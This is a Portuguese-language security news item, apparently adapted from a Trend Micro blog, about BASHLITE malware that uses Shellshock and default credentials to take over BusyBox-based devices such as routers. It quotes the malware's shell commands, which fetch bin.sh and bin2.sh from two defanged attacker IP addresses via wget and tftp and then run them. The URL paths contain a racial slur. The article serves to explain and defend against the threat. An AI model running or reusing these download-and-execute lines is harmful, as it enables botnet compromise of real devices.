• BASHLITE Afeta Dispositivos Executados a Partir do BusyBox

    Quando a notícia da vulnerabilidade Shellshock eclodiu no final do mês de setembro, foi possível notar vários ataques que alavancaram a referida vulnerabilidade, manifestando-se, assim, a prevalência ou mesmo a evolução de como os atacantes utilizaram o exploit. Por exemplo, os atacantes utilizaram o Shellshock contra servidores SMTP, para ataques de propagação de botnets, e até mesmo para baixar o código fonte KAITEN dentre outras práticas igualmente nefastas. Sendo assim, os pesquisadores de segurança da Trend Micro tem realizado um monitoramento contínuo desta vulnerabilidade e na última pesquisa realizada, observou-se que as amostras recentes de BASHLITE (detectadas pela Trend Micro como ELF_BASHLITE.SMB), tem o poder de varrer a rede para dispositivos/máquinas que estão sendo executadas no BusyBox e logs, usando um conjunto de nomes de usuários e senhas.


    Uma vez que uma conexão é estabelecida, ele executa o comando para baixar e executar scripts bin.sh e bin2.sh, ganhando o controle sobre o sistema Busybox. Para quem não sabe, BusyBox é construído em cima do kernel do Linux e usado por pequenos dispositivos, como roteadores. Neste cenário, atacantes remotos podem maximizar seu controle nos dispositivos, afetados pela implantação de outros componentes ou por software malicioso atrelado ao sistema, em função da sua motivação. Isto é visto nas seguintes comandos:

    cd /tmp
    busybox wget http://69[.]163[.]37[.]115/.niggers/bin.sh
    busybox tftp -r bin.sh -g 69[.1]63[.]37[.]115
    sh bin.sh
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74′\r\n

    cd /tmp/
    busybox wget http://176[.]10[.]250[.]37/.niggers/bin2.sh
    busybox tftp -r bin2.sh -g 176[.]10[.]250[.]37
    sh bin2.sh
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74′\r\n

    Isso significa que o malware pode executar os seguintes comandos nos dispositivos afetados:

    - Mudar para a pasta temporária, onde geralmente não há acesso ao arquivo de gravação;
    - Baixar um arquivo remoto, dependendo se o script shell está hospedado via HTTP ou TFTP. Não há mecanismo de "fail-safe" para conseguir sua rotina de download. Isso significa que, se no primeiro comando ele não executar qualquer arquivo, tentará novamente se conectar à URL com a intenção de baixar o arquivo;
    - Executar o script shell baixado;
    - Realizar uma rotina de "fingerprinting", para verificar se o dispositivo funciona com o sistema BusyBox.


    Saiba Mais:

    [1] Blog Trend Micro http://blog.trendmicro.com/trendlabs...ng-on-busybox/

    Sobre o Autor: Camilla Lemke


Visite: BR-Linux ·  VivaOLinux ·  Dicas-L